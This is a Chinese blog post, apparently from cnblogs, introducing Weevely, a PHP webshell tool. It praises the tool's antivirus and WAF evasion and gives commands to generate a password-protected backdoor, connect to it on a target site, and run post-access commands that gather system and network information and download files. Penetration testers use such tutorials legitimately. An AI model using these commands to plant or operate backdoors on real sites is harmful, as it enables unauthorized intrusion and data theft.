首页 > 其他分享 >Weevely使用

Weevely使用

时间:2023-06-07 14:13:21浏览次数:30  
标签:后门 web Weevely 生成 使用 password

Weevely

一、 介绍

Weevely是一个轻量级的渗透测试工具,它允许渗透测试人员通过一个简单的命令行界面远程管理web应用程序或者操作系统。适用于管理php网站的webshell工具,该工具能生成木马免杀能力较强,而且使用加密连接,有一定突破WAF拦截的效果。

该工具使用python语言编写(Linux系统中的中国菜刀),支持图片与.htaccess两种绕过方式。生成的木马文件使用了base64加密处理。

二、 使用

1. 生成后门

weevely generate password path filename

# password表示生成后门的密码
# path表示生成后门文件路径

2. 连接后门

weevely http://target-web-site.com/filename password

连接建立后常用的命令:
:system_info 查看系统信息
:net_ifconfig 获取网卡信息
:file_ls 列出目录中的内容
:file_download 下载目标站点文件

标签:后门,web,Weevely,生成,使用,password
From: https://www.cnblogs.com/kalixcn/p/17463119.html

相关文章

  • 解决使用yarn安装依赖出现“The engine "node" is incompatible with this module. Ex
    1、问题描述某天在使用yarn安装依赖的时候,突然出现如下错误导致安装依赖终止:Theengine"node"isincompatiblewiththismodule.Expectedversion"^14.18.0||^16.14.0||>=18.0.0".Got"17.9.0"2、解决办法使用如下命令忽略错误:yarnconfigsetignore-enginestr......
  • sqlserver2014在新建维护计划时提示代理XP组件已做为此服务器安全配置的一部分被关闭,
    在sqlserver配置管理器中打开sqlserver代理即可 ......
  • vue3使用ElementPlus的消息el-message样式不生效或者被遮盖(z-index)
    一、el-message自定义样式不生效想改弹出框的位置时不生效,使用了el-message的自定义类的custom-class属性也不行。原因应该是加了scoped后使用到里面样式的dom会添加data-v-xxxx这种属性防止css污染,但是message生成的dom是没有添加data-v-xxx属性的,所以样式无效。解决方式:js动态设......
  • 在ubuntu上后台启动nodejs、使用pm2启动多个nodejs,
    前言很久以前淘到了一个非常简易的nodejs(聊天室)的源码,今天想把他放到我的ubuntu(server20.10)上。一、正文如果直接使用指令nodeapp.js,退出终端的时候会报错,可以使用pm2来实现后台运行!1.安装node.js和npmapt-getinstallnodejsapt-getinstallnpm安装好了之后可以使用whereisn......
  • sed命令简单使用示例分享
    Linux命令sed是“streameditor”的缩写,也就是流编辑器,它一次处理一行内容,处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(patternspace),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾。文件内容并没有改变......
  • git使用手册
    基本操作初始化gitinit 查询当前分支状态gitstatus 查看当前分支名称gitbranch 切换分支gitcheckoutxxx#要切换的分支名称 拉取最新当前分支gitpull 创建本地分支并切换到此分支gitcheckout-bdeveloporigin/develop#本地源/云分支......
  • [Kyana]动态博客的使用
    00|apache2+php+mysqlaptinstallapache2phpphp-fpmmysql-servera2enmodproxy_fcgisetenvif#php的网关代理a2enconfphp-fpmsystemctlenableapache2/php-fpm/mysqlserviceapache2/php-fpm/mysqlstartmysql-urootcreatedatabasetypecho;usertype@localho......
  • 博客园使用教程
    博客园注册按照引导注册账号申请写博客权限申请JS权限博客园美化选择SimpleMemory博客皮肤侧边栏界面美化在侧边栏公告处粘贴代码引用美化网址:https://zhangheheya.notion.site/9cfdff177556457f94cd08ef26c7dc86<scripttype="text/javascript">......
  • C++11中智能指针的原理、使用、实现
     目录理解智能指针的原理智能指针的使用智能指针的设计和实现1.智能指针的作用       C++程序设计中使用堆内存是非常频繁的操作,堆内存的申请和释放都由程序员自己管理。程序员自己管理堆内存可以提高了程序的效率,但是整体来说堆内存的管理是麻烦的,C++11中引入了智能指针的......
  • cppcheck代码扫描安装及使用
    一、 简介& 官网简介:CppCheck是一个静态代码检查工具,支持c/c++代码;作为编译器的一种补充检查,CppCheck对产品的源代码执行严格的逻辑检查。官网:http://cppcheck.net 二、安装环境安装gcc/g++  sudoapt-getinstallgccg++三、编译unzipcppcheck-......